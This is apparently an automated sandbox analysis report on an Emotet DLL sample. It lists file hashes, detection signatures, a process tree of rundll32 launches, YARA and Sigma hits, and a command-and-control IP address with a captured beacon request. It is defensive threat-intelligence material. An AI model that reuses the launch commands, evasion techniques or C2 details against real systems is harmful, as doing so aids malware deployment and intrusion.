Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report efELSMI5R4

Overview

General Information

Sample Name:efELSMI5R4 (renamed file extension from none to dll)
Analysis ID:532312
MD5:1ec5996508211a8d174a1a09d6289463
SHA1:ede146abf146c0dfdb88431dfecf5cc80b267335
SHA256:2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 5048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6740 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6416 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • loaddll32.exe (PID: 6404 cmdline: loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2064 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6276 cmdline: rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6316 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4244 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 360 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3176 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1896 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.rundll32.exe.3332418.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.3332418.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.0.loaddll32.exe.11e3b40.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.0.loaddll32.exe.11e3b40.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    2.0.loaddll32.exe.11e3b40.4.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 75 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4244, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, ProcessId: 360

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: efELSMI5R4.dllVirustotal: Detection: 19%Perma Link
                      Source: efELSMI5R4.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2
                      Source: efELSMI5R4.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE2C8 FindFirstFileW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: svchost.exe, 0000001C.00000003.676499557.00000214D4D96000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000001C.00000003.676499557.00000214D4D96000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: WerFault.exe, 00000018.00000002.620064823.0000000004C18000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618557628.0000000004C17000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618529956.0000000004C14000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693696632.00000214D4D00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.22.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3394 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.raw.unpack, type: UNPACKEDPE
